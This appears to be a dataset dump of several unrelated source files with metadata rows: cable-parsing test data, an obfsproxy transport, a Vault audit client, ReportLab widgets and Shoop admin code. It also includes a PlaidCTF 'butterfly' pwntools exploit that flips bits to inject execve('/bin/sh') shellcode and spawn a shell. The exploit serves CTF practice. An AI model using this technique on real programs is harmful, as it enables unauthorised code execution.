(u'02KATHMANDU485', u'Pmahoney'),
(u'09BAGHDAD990', u'Robert Ford'),
(u'08BAGHDAD3023', u'Robert Ford'),
(u'09USNATO530', u'Kelly Degnan'),
(u'07LISBON2305', u'Lclifton'),
(u'08BAGHDAD4004', u'John Fox'),
(u'04THEHAGUE2346', u'A. Schofer'),
(u'07TALLINN173', u'Jessica Adkins'),
(u'09BAKU80', u'Rob Garverick'),
(u'06PHNOMPENH1757', u'Jennifer Spande'),
(u'06QUITO1401', u'Ned Kelly'),
(u'05ZAGREB724', u'Justin Friedman'),
(u'05TOKYO1351', u'David B. Shear'),
(u'07KIGALI73', u'G Learned'),
(u'08ZAGREB554', u"Peter D'Amico"),
(u'07TASHKENT1950', (u'R. Fitzmaurice', u'T. Buckley')),
(u'07TASHKENT1679', (u'Richard Fitzmaurice', u'Steven Prohaska')),
(u'07TASHKENT1894', (u'Steven Prohaska', u'Richard Fitzmaurice')),
(u'08STATE68478', u'Margaret McKelvey'),
(u'04BRUSSELS416', u'Marc J. Meznar'),
(u'07BAGHDAD777', u'Jim Soriano'),
(u'05ALMATY3450', u'John Ordway'),
(u'05ACCRA2548', u'Nate Bluhm'),
(u'07ADDISABABA2523', u'Kent Healy'),
(u'09USUNNEWYORK746', u'Bruce C. Rashkow'),
(u'09STATE108370', u'Daniel Fried'),
(u'09BAGHDAD3120', u'Mark Storella'),
(u'09STATE64621', u'Richard C Holbrooke'),
(u'05NAIROBI4757', u'Chris Padilla'),
(u'05CAIRO5945', u'Stuart E. Jones'),
(u'07BAGHDAD1544', u'Steven R. Buckler'),
(u'07BAGHDAD1632', u'Steven R. Buckler'),
(u'02HARARE555', u'Aaron Tarver'),
(u'06BAGHDAD1021', u'Robert S. Ford'),
(u'06PRISTINA280', u'Philip S. Goldberg'),
(u'06SANSALVADOR849', u'Michael A. Butler'),
(u'06SUVA123', u'Larry M. Dinger'),
(u'06AITTAIPEI1142', u'Michael R. Wheeler'),
(u'08BEIRUT471', u'Michele J. Sison'),
(u'08MOSCOW937', u'Eric T. Schultz'),
(u'02HANOI2951', u'Emi Yamauchi'),
(u'08ROME525', u'Tom Delare',),
(u'01HARARE1632', u'Earl M. Irving'),
(u'06DUBAI5421', u'Timothy M. Brys'),
)
def test_parse_classified_by():
def check(expected, content, normalize):
if not isinstance(expected, tuple):
expected = (expected,)
eq_(expected, tuple(parse_classified_by(content, normalize)))
for testcase in _TEST_DATA:
if len(testcase) == 3:
ref_id, expected, content = testcase
normalize = False
else:
ref_id, expected, content, normalize = testcase
yield check, expected, content, normalize
def test_cable_classified_by():
def check(cable_id, expected):
if not isinstance(expected, tuple):
expected = (expected,)
cable = cable_by_id(cable_id)
ok_(cable, 'Cable "%s" not found' % cable_id)
eq_(expected, tuple(cable.classified_by))
for cable_id, expected in _TEST_CABLES:
yield check, cable_id, expected
if __name__ == '__main__':
import nose
nose.core.runmodule()
|
bsd-3-clause
| 7,676,235,879,460,244,000
| 36.018762
| 210
| 0.634053
| false
| 2.249957
| false
| false
| false
|
sunsong/obfsproxy
|
obfsproxy/transports/b64.py
|
1
|
2455
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" This module contains an implementation of the 'b64' transport. """
from obfsproxy.transports.base import BaseTransport
import base64
import obfsproxy.common.log as logging
log = logging.get_obfslogger()
def _get_b64_chunks_from_str(string):
"""
Given a 'string' of concatenated base64 objects, return a list
with the objects.
Assumes that the objects are well-formed base64 strings. Also
assumes that the padding character of base64 is '='.
"""
chunks = []
while True:
pad_loc = string.find('=')
if pad_loc < 0 or pad_loc == len(string)-1 or pad_loc == len(string)-2:
# If there is no padding, or it's the last chunk: append
# it to chunks and return.
chunks.append(string)
return chunks
if pad_loc != len(string)-1 and string[pad_loc+1] == '=': # double padding
pad_loc += 1
# Append the object to the chunks, and prepare the string for
# the next iteration.
chunks.append(string[:pad_loc+1])
string = string[pad_loc+1:]
return chunks
class B64Transport(BaseTransport):
"""
Implements the b64 protocol. A protocol that encodes data with
base64 before pushing them to the network.
"""
def __init__(self, transport_config):
super(B64Transport, self).__init__()
def receivedDownstream(self, data):
"""
Got data from downstream; relay them upstream.
"""
decoded_data = ''
# TCP is a stream protocol: the data we received might contain
# more than one b64 chunk. We should inspect the data and
# split it into multiple chunks.
b64_chunks = _get_b64_chunks_from_str(data.peek())
# Now b64 decode each chunk and append it to the our decoded
# data.
for chunk in b64_chunks:
try:
decoded_data += base64.b64decode(chunk)
except TypeError:
log.info("We got corrupted b64 ('%s')." % chunk)
return
data.drain()
self.circuit.upstream.write(decoded_data)
def receivedUpstream(self, data):
"""
Got data from upstream; relay them downstream.
"""
self.circuit.downstream.write(base64.b64encode(data.read()))
return
class B64Client(B64Transport):
pass
class B64Server(B64Transport):
pass
|
bsd-3-clause
| 6,540,606,080,512,612,000
| 25.978022
| 82
| 0.606517
| false
| 4.004894
| false
| false
| false
|
ianunruh/hvac
|
hvac/api/system_backend/audit.py
|
1
|
3598
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Support for "Audit"-related System Backend Methods."""
from hvac.api.system_backend.system_backend_mixin import SystemBackendMixin
class Audit(SystemBackendMixin):
def list_enabled_audit_devices(self):
"""List enabled audit devices.
It does not list all available audit devices.
This endpoint requires sudo capability in addition to any path-specific capabilities.
Supported methods:
GET: /sys/audit. Produces: 200 application/json
:return: JSON response of the request.
:rtype: dict
"""
list_audit_devices_response = self._adapter.get('/v1/sys/audit').json()
return list_audit_devices_response
def enable_audit_device(self, device_type, description=None, options=None, path=None):
"""Enable a new audit device at the supplied path.
The path can be a single word name or a more complex, nested path.
Supported methods:
PUT: /sys/audit/{path}. Produces: 204 (empty body)
:param device_type: Specifies the type of the audit device.
:type device_type: str | unicode
:param description: Human-friendly description of the audit device.
:type description: str | unicode
:param options: Configuration options to pass to the audit device itself. This is
dependent on the audit device type.
:type options: str | unicode
:param path: Specifies the path in which to enable the audit device. This is part of
the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
if path is None:
path = device_type
params = {
'type': device_type,
'description': description,
'options': options,
}
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.post(
url=api_path,
json=params
)
def disable_audit_device(self, path):
"""Disable the audit device at the given path.
Supported methods:
DELETE: /sys/audit/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to delete. This is part of the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.delete(
url=api_path,
)
def calculate_hash(self, path, input_to_hash):
"""Hash the given input data with the specified audit device's hash function and salt.
This endpoint can be used to discover whether a given plaintext string (the input parameter) appears in the
audit log in obfuscated form.
Supported methods:
POST: /sys/audit-hash/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to generate hashes for. This is part of the request URL.
:type path: str | unicode
:param input_to_hash: The input string to hash.
:type input_to_hash: str | unicode
:return: The JSON response of the request.
:rtype: requests.Response
"""
params = {
'input': input_to_hash,
}
api_path = '/v1/sys/audit-hash/{path}'.format(path=path)
response = self._adapter.post(
url=api_path,
json=params
)
return response.json()
|
apache-2.0
| 181,234,886,285,527,170
| 34.27451
| 115
| 0.611451
| false
| 4.345411
| false
| false
| false
|
Melrok/energistream-py
|
tests/verify.py
|
1
|
1840
|
#would like to use difflib here eventually
hashLine = ('#' * 80) + '\n'
class Verify(object):
def str_equal(self, expected, actual, errMessage=None):
if self == expected:
return
if expected is None:
raise AssertionError("{0} expected is None".format(errMessage))
if actual is None:
raise AssertionError("{0} actual is None".format(errMessage))
return self.equal(str(expected), str(actual), errMessage)
def equal(self, expected, actual, err_message=None):
if expected == actual:
return
if type(expected) != type(actual):
message = '\n' + hashLine
message += '\tType mismatch, expected type "{0}"\n\tactually "{1}"'.format(str(type(expected)), str(type(actual)))
message += '\n' + hashLine
raise AssertionError(message)
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
message += hashLine
message += '\texpected "{0}"\n\tactually "{1}"'.format(str(expected), str(actual))
message += '\n' + hashLine
raise AssertionError(message)
def str_in(self, container, contained, err_message=None):
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
if container is None:
raise AssertionError("{0} container is None".format(message))
if contained is None:
raise AssertionError("{0} contained is None".format(message))
if contained in container:
return
message += hashLine
message += '\texpected:\t"{0}" \n\tin:\t\t"{1}"'.format(contained, container)
message += '\n' + hashLine
raise AssertionError(message)
|
mit
| 895,279,386,831,197,200
| 33.716981
| 126
| 0.573913
| false
| 4.191344
| false
| false
| false
|
tschalch/pyTray
|
src/lib/reportlab/graphics/widgetbase.py
|
1
|
17565
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/widgetbase.py
__version__=''' $Id: widgetbase.py,v 1.1 2006/05/26 19:19:38 thomas Exp $ '''
import string
from reportlab.graphics import shapes
from reportlab import rl_config
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
class PropHolder:
'''Base for property holders'''
_attrMap = None
def verify(self):
"""If the _attrMap attribute is not None, this
checks all expected attributes are present; no
unwanted attributes are present; and (if a
checking function is found) checks each
attribute has a valid value. Either succeeds
or raises an informative exception.
"""
if self._attrMap is not None:
for key in self.__dict__.keys():
if key[0] <> '_':
msg = "Unexpected attribute %s found in %s" % (key, self)
assert self._attrMap.has_key(key), msg
for (attr, metavalue) in self._attrMap.items():
msg = "Missing attribute %s from %s" % (attr, self)
assert hasattr(self, attr), msg
value = getattr(self, attr)
args = (value, attr, self.__class__.__name__)
assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % args
if rl_config.shapeChecking:
"""This adds the ability to check every attribute assignment
as it is made. It slows down shapes but is a big help when
developing. It does not get defined if rl_config.shapeChecking = 0.
"""
def __setattr__(self, name, value):
"""By default we verify. This could be off
in some parallel base classes."""
validateSetattr(self,name,value)
def getProperties(self,recur=1):
"""Returns a list of all properties which can be edited and
which are not marked as private. This may include 'child
widgets' or 'primitive shapes'. You are free to override
this and provide alternative implementations; the default
one simply returns everything without a leading underscore.
"""
from reportlab.lib.validators import isValidChild
# TODO when we need it, but not before -
# expose sequence contents?
props = {}
for name in self.__dict__.keys():
if name[0:1] <> '_':
component = getattr(self, name)
if recur and isValidChild(component):
# child object, get its properties too
childProps = component.getProperties(recur=recur)
for (childKey, childValue) in childProps.items():
#key might be something indexed like '[2].fillColor'
#or simple like 'fillColor'; in the former case we
#don't need a '.' between me and my child.
if childKey[0] == '[':
props['%s%s' % (name, childKey)] = childValue
else:
props['%s.%s' % (name, childKey)] = childValue
else:
props[name] = component
return props
def setProperties(self, propDict):
"""Permits bulk setting of properties. These may include
child objects e.g. "chart.legend.width = 200".
All assignments will be validated by the object as if they
were set individually in python code.
All properties of a top-level object are guaranteed to be
set before any of the children, which may be helpful to
widget designers.
"""
childPropDicts = {}
for (name, value) in propDict.items():
parts = string.split(name, '.', 1)
if len(parts) == 1:
#simple attribute, set it now
setattr(self, name, value)
else:
(childName, remains) = parts
try:
childPropDicts[childName][remains] = value
except KeyError:
childPropDicts[childName] = {remains: value}
# now assign to children
for (childName, childPropDict) in childPropDicts.items():
child = getattr(self, childName)
child.setProperties(childPropDict)
def dumpProperties(self, prefix=""):
"""Convenience. Lists them on standard output. You
may provide a prefix - mostly helps to generate code
samples for documentation.
"""
propList = self.getProperties().items()
propList.sort()
if prefix:
prefix = prefix + '.'
for (name, value) in propList:
print '%s%s = %s' % (prefix, name, value)
class Widget(PropHolder, shapes.UserNode):
"""Base for all user-defined widgets. Keep as simple as possible. Does
not inherit from Shape so that we can rewrite shapes without breaking
widgets and vice versa."""
def _setKeywords(self,**kw):
for k,v in kw.items():
if not self.__dict__.has_key(k):
setattr(self,k,v)
def draw(self):
msg = "draw() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def demo(self):
msg = "demo() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def provideNode(self):
return self.draw()
def getBounds(self):
"Return outer boundary as x1,y1,x2,y2. Can be overridden for efficiency"
return self.draw().getBounds()
_ItemWrapper={}
class TypedPropertyCollection(PropHolder):
"""A container with properties for objects of the same kind.
This makes it easy to create lists of objects. You initialize
it with a class of what it is to contain, and that is all you
can add to it. You can assign properties to the collection
as a whole, or to a numeric index within it; if so it creates
a new child object to hold that data.
So:
wedges = TypedPropertyCollection(WedgeProperties)
wedges.strokeWidth = 2 # applies to all
wedges.strokeColor = colors.red # applies to all
wedges[3].strokeColor = colors.blue # only to one
The last line should be taken as a prescription of how to
create wedge no. 3 if one is needed; no error is raised if
there are only two data points.
"""
def __init__(self, exampleClass):
#give it same validation rules as what it holds
self.__dict__['_value'] = exampleClass()
self.__dict__['_children'] = {}
def __getitem__(self, index):
try:
return self._children[index]
except KeyError:
Klass = self._value.__class__
if _ItemWrapper.has_key(Klass):
WKlass = _ItemWrapper[Klass]
else:
class WKlass(Klass):
def __getattr__(self,name):
try:
return self.__class__.__bases__[0].__getattr__(self,name)
except:
if self._index and self._parent._children.has_key(self._index):
if self._parent._children[self._index].__dict__.has_key(name):
return getattr(self._parent._children[self._index],name)
return getattr(self._parent,name)
_ItemWrapper[Klass] = WKlass
child = WKlass()
child._parent = self
if type(index) in (type(()),type([])):
index = tuple(index)
if len(index)>1:
child._index = tuple(index[:-1])
else:
child._index = None
else:
child._index = None
for i in filter(lambda x,K=child.__dict__.keys(): x in K,child._attrMap.keys()):
del child.__dict__[i]
self._children[index] = child
return child
def has_key(self,key):
if type(key) in (type(()),type([])): key = tuple(key)
return self._children.has_key(key)
def __setitem__(self, key, value):
msg = "This collection can only hold objects of type %s" % self._value.__class__.__name__
assert isinstance(value, self._value.__class__), msg
def __len__(self):
return len(self._children.keys())
def getProperties(self,recur=1):
# return any children which are defined and whatever
# differs from the parent
props = {}
for (key, value) in self._value.getProperties(recur=recur).items():
props['%s' % key] = value
for idx in self._children.keys():
childProps = self._children[idx].getProperties(recur=recur)
for (key, value) in childProps.items():
if not hasattr(self,key) or getattr(self, key)<>value:
newKey = '[%s].%s' % (idx, key)
props[newKey] = value
return props
def setVector(self,**kw):
for name, value in kw.items():
for i in xrange(len(value)):
setattr(self[i],name,value[i])
def __getattr__(self,name):
return getattr(self._value,name)
def __setattr__(self,name,value):
return setattr(self._value,name,value)
## No longer needed!
class StyleProperties(PropHolder):
"""A container class for attributes used in charts and legends.
Attributes contained can be those for any graphical element
(shape?) in the ReportLab graphics package. The idea for this
container class is to be useful in combination with legends
and/or the individual appearance of data series in charts.
A legend could be as simple as a wrapper around a list of style
properties, where the 'desc' attribute contains a descriptive
string and the rest could be used by the legend e.g. to draw
something like a color swatch. The graphical presentation of
the legend would be its own business, though.
A chart could be inspecting a legend or, more directly, a list
of style properties to pick individual attributes that it knows
about in order to render a particular row of the data. A bar
chart e.g. could simply use 'strokeColor' and 'fillColor' for
drawing the bars while a line chart could also use additional
ones like strokeWidth.
"""
_attrMap = AttrMap(
strokeWidth = AttrMapValue(isNumber),
strokeLineCap = AttrMapValue(isNumber),
strokeLineJoin = AttrMapValue(isNumber),
strokeMiterLimit = AttrMapValue(None),
strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
strokeOpacity = AttrMapValue(isNumber),
strokeColor = AttrMapValue(isColorOrNone),
fillColor = AttrMapValue(isColorOrNone),
desc = AttrMapValue(isString),
)
def __init__(self, **kwargs):
"Initialize with attributes if any."
for k, v in kwargs.items():
setattr(self, k, v)
def __setattr__(self, name, value):
"Verify attribute name and value, before setting it."
validateSetattr(self,name,value)
class TwoCircles(Widget):
def __init__(self):
self.leftCircle = shapes.Circle(100,100,20, fillColor=colors.red)
self.rightCircle = shapes.Circle(300,100,20, fillColor=colors.red)
def draw(self):
return shapes.Group(self.leftCircle, self.rightCircle)
class Face(Widget):
"""This draws a face with two eyes.
It exposes a couple of properties
to configure itself and hides all other details.
"""
_attrMap = AttrMap(
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
size = AttrMapValue(isNumber),
skinColor = AttrMapValue(isColorOrNone),
eyeColor = AttrMapValue(isColorOrNone),
mood = AttrMapValue(OneOf('happy','sad','ok')),
)
def __init__(self):
self.x = 10
self.y = 10
self.size = 80
self.skinColor = None
self.eyeColor = colors.blue
self.mood = 'happy'
def demo(self):
pass
def draw(self):
s = self.size # abbreviate as we will use this a lot
g = shapes.Group()
g.transform = [1,0,0,1,self.x, self.y]
# background
g.add(shapes.Circle(s * 0.5, s * 0.5, s * 0.5, fillColor=self.skinColor))
# left eye
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# right eye
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# nose
g.add(shapes.Polygon(
points=[s * 0.5, s * 0.6, s * 0.4, s * 0.3, s * 0.6, s * 0.3],
fillColor=None))
# mouth
if self.mood == 'happy':
offset = -0.05
elif self.mood == 'sad':
offset = +0.05
else:
offset = 0
g.add(shapes.Polygon(
points = [
s * 0.3, s * 0.2, #left of mouth
s * 0.7, s * 0.2, #right of mouth
s * 0.6, s * (0.2 + offset), # the bit going up or down
s * 0.4, s * (0.2 + offset) # the bit going up or down
],
fillColor = colors.pink,
strokeColor = colors.red,
strokeWidth = s * 0.03
))
return g
class TwoFaces(Widget):
def __init__(self):
self.faceOne = Face()
self.faceOne.mood = "happy"
self.faceTwo = Face()
self.faceTwo.x = 100
self.faceTwo.mood = "sad"
def draw(self):
"""Just return a group"""
return shapes.Group(self.faceOne, self.faceTwo)
def demo(self):
"""The default case already looks good enough,
no implementation needed here"""
pass
class Sizer(Widget):
"Container to show size of all enclosed objects"
_attrMap = AttrMap(BASE=shapes.SolidShape,
contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
)
def __init__(self, *elements):
self.contents = []
self.fillColor = colors.cyan
self.strokeColor = colors.magenta
for elem in elements:
self.add(elem)
def _addNamedNode(self,name,node):
'if name is not None add an attribute pointing to node and add to the attrMap'
if name:
if name not in self._attrMap.keys():
self._attrMap[name] = AttrMapValue(isValidChild)
setattr(self, name, node)
def add(self, node, name=None):
"""Appends non-None child node to the 'contents' attribute. In addition,
if a name is provided, it is subsequently accessible by name
"""
# propagates properties down
if node is not None:
assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
self.contents.append(node)
self._addNamedNode(name,node)
def getBounds(self):
# get bounds of each object
if self.contents:
b = []
for elem in self.contents:
b.append(elem.getBounds())
return shapes.getRectsBounds(b)
else:
return (0,0,0,0)
def draw(self):
g = shapes.Group()
(x1, y1, x2, y2) = self.getBounds()
r = shapes.Rect(
x = x1,
y = y1,
width = x2-x1,
height = y2-y1,
fillColor = self.fillColor,
strokeColor = self.strokeColor
)
g.add(r)
for elem in self.contents:
g.add(elem)
return g
def test():
from reportlab.graphics.charts.piecharts import WedgeProperties
wedges = TypedPropertyCollection(WedgeProperties)
wedges.fillColor = colors.red
wedges.setVector(fillColor=(colors.blue,colors.green,colors.white))
print len(_ItemWrapper)
d = shapes.Drawing(400, 200)
tc = TwoCircles()
d.add(tc)
import renderPDF
renderPDF.drawToFile(d, 'sample_widget.pdf', 'A Sample Widget')
print 'saved sample_widget.pdf'
d = shapes.Drawing(400, 200)
f = Face()
f.skinColor = colors.yellow
f.mood = "sad"
d.add(f, name='theFace')
print 'drawing 1 properties:'
d.dumpProperties()
renderPDF.drawToFile(d, 'face.pdf', 'A Sample Widget')
print 'saved face.pdf'
d2 = d.expandUserNodes()
renderPDF.drawToFile(d2, 'face_copy.pdf', 'An expanded drawing')
print 'saved face_copy.pdf'
print 'drawing 2 properties:'
d2.dumpProperties()
if __name__=='__main__':
test()
|
bsd-3-clause
| -6,657,977,910,297,390,000
| 33.846939
| 111
| 0.561856
| false
| 4.165283
| false
| false
| false
|
parksjin01/ctf
|
2016/Plaid/butterfly.py
|
1
|
1767
|
#!/usr/bin/env python2
from pwn import *
#r = remote('butterfly.pwning.xxx', 9999)
r = process('./butterfly')
loop_val = '0x20041c6'
# Start the loop
r.sendline(loop_val)
# Generate the payload
start_addr = 0x40084a
shell_addr = 0x400914
shellcode = '4831f648c7c03b0000004831d248c7c7140940000f05'
text = '4531f664488b042528000000483b44244075264489f0'
shell = ''.join('{:02x}'.format(ord(c)) for c in list('/bin/sh\0'))
greeting = 'THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?'[0:8]
greeting = ''.join('{:02x}'.format(ord(c)) for c in greeting)
# We need to parse it bytes after bytes
chunks_sc = [shellcode[i:i+2] for i in range(0, len(shellcode), 2)]
chunks_tx = [text[i:i+2] for i in range(0, len(text), 2)]
# loop over each byte
for i in range(0,len(chunks_tx)):
# compute the flips needed
flips = list('{:08b}'.format(int(chunks_tx[i],16) ^ int(chunks_sc[i], 16)))
flips.reverse()
indices = []
# store the offsets of the flips in a table
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
# for each flip send a corresponding number
for n in indices:
r.sendline('0x{:x}'.format((start_addr + i) * 8 + n))
#Same for the greeting and shell
chunks_sh = [shell[i:i+2] for i in range(0, len(shell), 2)]
chunks_gr = [greeting[i:i+2] for i in range(0, len(greeting), 2)]
for i in range(0,len(chunks_gr)):
flips = list('{:08b}'.format(int(chunks_gr[i],16) ^ int(chunks_sh[i], 16)))
flips.reverse()
indices = []
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
for n in indices:
r.sendline('0x{:x}'.format((shell_addr + i) * 8 + n))
# Reset the call to mprotect
r.sendline(loop_val)
r.clean()
r.interactive()
|
mit
| -8,768,587,543,166,460,000
| 30.553571
| 79
| 0.633843
| false
| 2.621662
| false
| false
| false
|
taedori81/shoop
|
shoop/admin/utils/picotable.py
|
1
|
13367
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
import six
from django.core.paginator import EmptyPage, Paginator
from django.db.models import Count, Manager, Q, QuerySet
from django.http.response import JsonResponse
from django.template.defaultfilters import yesno
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.urls import get_model_url, NoModelUrl
from shoop.utils.dates import try_parse_date
from shoop.utils.objects import compact
from shoop.utils.serialization import ExtendedJSONEncoder
def maybe_callable(thing, context=None):
"""
If `thing` is callable, return it.
If `thing` names a callable attribute of `context`, return it.
"""
if callable(thing):
return thing
if isinstance(thing, six.string_types):
thing = getattr(context, thing, None)
if callable(thing):
return thing
return None
def maybe_call(thing, context, args=None, kwargs=None):
"""
If `thing` is callable, call it with args and kwargs and return the value.
If `thing` names a callable attribute of `context`, call it with args and kwargs and return the value.
Otherwise return `thing`.
"""
func = maybe_callable(context=context, thing=thing)
if func:
thing = func(*(args or ()), **(kwargs or {}))
return thing
class Filter(object):
type = None
def to_json(self, context):
return None
def filter_queryset(self, queryset, column, value):
return queryset # pragma: no cover
class ChoicesFilter(Filter):
type = "choices"
def __init__(self, choices=None, filter_field=None):
self.filter_field = filter_field
self.choices = choices
def _flatten_choices(self, context):
if not self.choices:
return None
choices = maybe_call(self.choices, context=context)
if isinstance(choices, QuerySet):
choices = [(c.pk, c) for c in choices]
return [(None, "")] + [
(force_text(value, strings_only=True), force_text(display))
for (value, display)
in choices
]
def to_json(self, context):
return {
"choices": self._flatten_choices(context)
}
def filter_queryset(self, queryset, column, value):
return queryset.filter(**{(self.filter_field or column.id): value})
class RangeFilter(Filter):
type = "range"
def __init__(self, min=None, max=None, step=None, field_type=None, filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param min: Minimum value.
:param max: Maximum value.
:param step: Step value. See the HTML5 documentation for semantics.
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
"""
self.filter_field = filter_field
self.min = min
self.max = max
self.step = step
self.field_type = field_type
def to_json(self, context):
return {
"range": compact({
"min": maybe_call(self.min, context=context),
"max": maybe_call(self.max, context=context),
"step": maybe_call(self.step, context=context),
"type": self.field_type,
})
}
def filter_queryset(self, queryset, column, value):
if value:
min = value.get("min")
max = value.get("max")
q = {}
filter_field = (self.filter_field or column.id)
if min is not None:
q["%s__gte" % filter_field] = min
if max is not None:
q["%s__lte" % filter_field] = max
if q:
queryset = queryset.filter(**q)
return queryset
class DateRangeFilter(RangeFilter):
def __init__(self, *args, **kwargs):
super(DateRangeFilter, self).__init__(*args, **kwargs)
if not self.field_type:
self.field_type = "date"
def filter_queryset(self, queryset, column, value):
if value:
value = {
"min": try_parse_date(value.get("min")),
"max": try_parse_date(value.get("max")),
}
return super(DateRangeFilter, self).filter_queryset(queryset, column, value)
class TextFilter(Filter):
type = "text"
def __init__(self, field_type=None, placeholder=None, operator="icontains", filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
:param placeholder: Field placeholder string.
:type placeholder: str|None
:param operator: Django operator for the queryset.
:type operator: str
"""
self.filter_field = filter_field
self.field_type = field_type
self.placeholder = placeholder
self.operator = operator
def to_json(self, context):
return {
"text": compact({
"type": self.field_type,
"placeholder": force_text(self.placeholder) if self.placeholder else None,
})
}
def filter_queryset(self, queryset, column, value):
if value:
value = force_text(value).strip()
if value:
return queryset.filter(**{"%s__%s" % ((self.filter_field or column.id), self.operator): value})
return queryset
class MultiFieldTextFilter(TextFilter):
def __init__(self, filter_fields, **kwargs):
"""
:param filter_field: List of Filter fields (Django query expression).
:type filter_field: list<str>
:param kwargs: Kwargs for `TextFilter`.
"""
super(MultiFieldTextFilter, self).__init__(**kwargs)
self.filter_fields = tuple(filter_fields)
def filter_queryset(self, queryset, column, value):
if value:
q = Q()
for filter_field in self.filter_fields:
q |= Q(**{"%s__%s" % (filter_field, self.operator): value})
return queryset.filter(q)
return queryset
true_or_false_filter = ChoicesFilter([
(False, _("no")),
(True, _("yes"))
])
class Column(object):
def __init__(self, id, title, **kwargs):
self.id = id
self.title = title
self.sort_field = kwargs.pop("sort_field", id)
self.display = kwargs.pop("display", id)
self.class_name = kwargs.pop("class_name", None)
self.filter_config = kwargs.pop("filter_config", None)
self.sortable = bool(kwargs.pop("sortable", True))
self.linked = bool(kwargs.pop("linked", True))
if kwargs and type(self) is Column: # If we're not derived, validate that client code doesn't fail
raise NameError("Unexpected kwarg(s): %s" % kwargs.keys())
def to_json(self, context=None):
out = {
"id": force_text(self.id),
"title": force_text(self.title),
"className": force_text(self.class_name) if self.class_name else None,
"filter": self.filter_config.to_json(context=context) if self.filter_config else None,
"sortable": bool(self.sortable),
"linked": bool(self.linked),
}
return dict((key, value) for (key, value) in six.iteritems(out) if value is not None)
def sort_queryset(self, queryset, desc=False):
order_by = ("-" if desc else "") + self.sort_field
queryset = queryset.order_by(order_by)
if self.sort_field.startswith("translations__"):
# Ref http://archlinux.me/dusty/2010/12/07/django-dont-use-distinct-and-order_by-across-relations/
queryset = queryset.annotate(_dummy_=Count(self.sort_field))
return queryset
def filter_queryset(self, queryset, value):
if self.filter_config:
queryset = self.filter_config.filter_queryset(queryset, self, value)
return queryset
def get_display_value(self, context, object):
display_callable = maybe_callable(self.display, context=context)
if display_callable:
return display_callable(object)
value = object
for bit in self.display.split("__"):
value = getattr(value, bit, None)
if isinstance(value, bool):
value = yesno(value)
if isinstance(value, Manager):
value = ", ".join("%s" % x for x in value.all())
return force_text(value)
class Picotable(object):
def __init__(self, request, columns, queryset, context):
self.request = request
self.columns = columns
self.queryset = queryset
self.context = context
self.columns_by_id = dict((c.id, c) for c in self.columns)
self.get_object_url = maybe_callable("get_object_url", context=self.context)
self.get_object_abstract = maybe_callable("get_object_abstract", context=self.context)
def process_queryset(self, query):
queryset = self.queryset
filters = (query.get("filters") or {})
for column, value in six.iteritems(filters):
column = self.columns_by_id.get(column)
if column:
queryset = column.filter_queryset(queryset, value)
sort = query.get("sort")
if sort:
desc = (sort[0] == "-")
column = self.columns_by_id.get(sort[1:])
if not (column and column.sortable):
raise ValueError("Can't sort by column %r" % sort[1:])
queryset = column.sort_queryset(queryset, desc=desc)
return queryset
def get_data(self, query):
paginator = Paginator(self.process_queryset(query), query["perPage"])
try:
page = paginator.page(int(query["page"]))
except EmptyPage:
page = paginator.page(paginator.num_pages)
out = {
"columns": [c.to_json(context=self.context) for c in self.columns],
"pagination": {
"perPage": paginator.per_page,
"nPages": paginator.num_pages,
"nItems": paginator.count,
"pageNum": page.number,
},
"items": [self.process_item(item) for item in page],
"itemInfo": _("Showing %(per_page)s of %(n_items)s %(verbose_name_plural)s") % {
"per_page": min(paginator.per_page, paginator.count),
"n_items": paginator.count,
"verbose_name_plural": self.get_verbose_name_plural(),
}
}
return out
def process_item(self, object):
out = {
"_id": object.id,
"_url": (self.get_object_url(object) if callable(self.get_object_url) else None),
}
for column in self.columns:
out[column.id] = column.get_display_value(context=self.context, object=object)
out["_abstract"] = (self.get_object_abstract(object, item=out) if callable(self.get_object_abstract) else None)
return out
def get_verbose_name_plural(self):
try:
return self.queryset.model._meta.verbose_name_plural
except AttributeError:
return _("objects")
class PicotableViewMixin(object):
columns = []
picotable_class = Picotable
template_name = "shoop/admin/base_picotable.jinja"
def process_picotable(self, query_json):
pico = self.picotable_class(
request=self.request,
columns=self.columns,
queryset=self.get_queryset(),
context=self
)
